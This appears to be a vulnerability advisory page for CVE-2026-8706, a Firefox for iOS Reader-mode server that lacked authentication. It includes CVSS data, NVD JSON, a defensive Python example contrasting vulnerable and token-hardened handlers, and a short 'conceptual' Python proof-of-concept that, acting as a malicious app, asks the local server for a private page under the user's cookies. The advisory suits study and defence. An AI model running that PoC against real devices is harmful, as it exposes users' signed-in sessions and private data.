Security Vulnerability Report
CVE-2026-8706 CVSS 6.5 MEDIUM

CVE-2026-8706

Published: 2026-05-19 16:16:23
Last Modified: 2026-05-19 18:16:32

Description

Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user's cookies. This vulnerability was fixed in Firefox for iOS 151.0.
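The description boils down to a missing-authentication weakness (CWE-306) on a loopback HTTP service: binding to 127.0.0.1 keeps remote hosts out, but the attacker here is another app on the same device, which can reach loopback just as well as Firefox's own web view can. The following is an added example written for this report; it is not Mozilla's code and not the change shipped in 151.0 (the page does not describe that change). It models the vulnerable pattern next to one common hardening for local helper servers: a secret generated per launch that only the owning app holds, checked with a constant-time comparison, plus a scheme allowlist for the fetched URL. The endpoint path, the `url` query parameter, the `Authorization` header and the cookie value are assumptions for illustration.

```python
"""
Added example for CVE-2026-8706; not Mozilla's code and not its fix.
Models a loopback Reader-mode service with no caller authentication
(the vulnerable pattern) and a hardened variant using a per-launch
bearer token. Endpoint path, "url" parameter, header name and cookie
value are assumptions, not taken from Firefox.
"""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the signed-in user's cookie jar.
USER_COOKIES = {"sessionid": "constructed-session-cookie"}
READER_PATH = "/reader-mode"  # assumed endpoint name


def fetch_with_cookies(url):
    """Stand-in for the browser fetching and rendering `url` with the user's
    session cookies attached; returns a constructed body instead of real HTML."""
    return f"<reader src={url!r} cookies={USER_COOKIES!r}/>"


def parse_target(request_line):
    """Extract the requested URL from 'GET /reader-mode?url=... HTTP/1.1'.
    Returns None if the method, path or parameter is not what we expect."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    split = urlsplit(parts[1])
    if split.path != READER_PATH:
        return None
    return parse_qs(split.query).get("url", [None])[0]


def vulnerable_handler(request_line, headers):
    """Vulnerable pattern: every process that can reach 127.0.0.1 is trusted.
    Listening on loopback is no defence, because the attacker is another app
    on the same device, exactly the position the CVE describes."""
    target = parse_target(request_line)
    if target is None:
        return 400, "bad request"
    return 200, fetch_with_cookies(target)


class HardenedReaderService:
    """Hardened pattern: a per-launch bearer token handed only to the app's own
    web view; requests without it are rejected before any fetch happens."""

    def __init__(self):
        self.token = secrets.token_urlsafe(32)  # regenerated on every launch

    def _authorized(self, headers):
        presented = headers.get("Authorization", "")
        expected = "Bearer " + self.token
        # Constant-time comparison so timing does not leak the token byte by byte.
        return hmac.compare_digest(presented.encode(), expected.encode())

    def handle(self, request_line, headers):
        if not self._authorized(headers):
            return 401, "unauthorized"
        target = parse_target(request_line)
        if target is None:
            return 400, "bad request"
        # Reader mode only needs web pages; refuse file:// and other schemes.
        if urlsplit(target).scheme not in ("http", "https"):
            return 400, "unsupported scheme"
        return 200, fetch_with_cookies(target)


if __name__ == "__main__":
    # Simulated request from a malicious co-resident app that knows the port
    # and endpoint but not the per-launch token.
    attacker = "GET /reader-mode?url=https://example.com/private/user-data HTTP/1.1"
    print("vulnerable:", vulnerable_handler(attacker, {}))
    svc = HardenedReaderService()
    print("hardened, no token:", svc.handle(attacker, {}))
    print("hardened, own token:", svc.handle(attacker, {"Authorization": "Bearer " + svc.token}))
```

The token only helps if it reaches the legitimate client through a channel other apps cannot observe (for example, injected into the page the app itself loads into its web view) and is never written to a world-readable location or a predictable port-plus-path. The check is also independent of the bind address: it is what closes the same-device gap that a loopback bind leaves open.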

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Weaknesses
CWE-200 (Exposure of Sensitive Information to an Unauthorized Actor), CWE-306 (Missing Authentication for Critical Function)

Note: the vector rates confidentiality High with no integrity or availability impact, which matches the description: a co-resident app can read responses rendered with the user's cookies, but nothing on the page describes modifying them. The CVSS metrics above are NVD's secondary (CNA-supplied) assessment; the record is still marked "Undergoing Analysis".

Configurations (Affected Products)

No CPE configuration data is available in the NVD record yet (status: Undergoing Analysis).

Affected, per the description: Firefox for iOS < 151.0. Fixed in Firefox for iOS 151.0.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Conceptual Proof of Concept (PoC) for CVE-2026-8706
# This script simulates a malicious app on the same device interacting
# with the vulnerable local web server of Firefox for iOS.
# The actual local port and endpoint would need to be determined via analysis.

# Assuming the reader mode endpoint listens on localhost.
TARGET_LOCALHOST = "http://127.0.0.1:8080/reader-mode"

# The target URL that the attacker wants to fetch using the victim's session.
# This could be a private API endpoint or a user profile page.
SENSITIVE_TARGET_URL = "https://example.com/private/user-data"


def exploit():
    print(f"[*] Attempting to connect to local Firefox server: {TARGET_LOCALHOST}")
    try:
        # Construct the payload. The parameter name 'url' is hypothetical.
        params = {"url": SENSITIVE_TARGET_URL}

        # Send the request to the unauthenticated local server
        response = requests.get(TARGET_LOCALHOST, params=params, timeout=5)

        if response.status_code == 200:
            print("[+] Request successful!")
            print("[+] Leaked content (rendered by Firefox with user cookies):")
            print("-" * 40)
            print(response.text)
            print("-" * 40)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except requests.exceptions.ConnectionError:
        print("[!] Could not connect to the local server. Firefox may not be running or the port is different.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    exploit()
```

References

https://bugzilla.mozilla.org/show_bug.cgi?id=2036618
https://www.mozilla.org/security/advisories/mfsa2026-49/
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-8706",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-19T16:16:22.580",
    "lastModified": "2026-05-19T18:16:32.350",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Firefox for iOS hosted Reader mode on an unauthenticated local web server, allowing another application on the same device to request arbitrary URLs and receive the response rendered with the signed-in user's cookies. This vulnerability was fixed in Firefox for iOS 151.0."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "ADJACENT_NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-200"},
          {"lang": "en", "value": "CWE-306"}
        ]
      }
    ],
    "references": [
      {"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2036618", "source": "[email protected]"},
      {"url": "https://www.mozilla.org/security/advisories/mfsa2026-49/", "source": "[email protected]"}
    ]
  }
}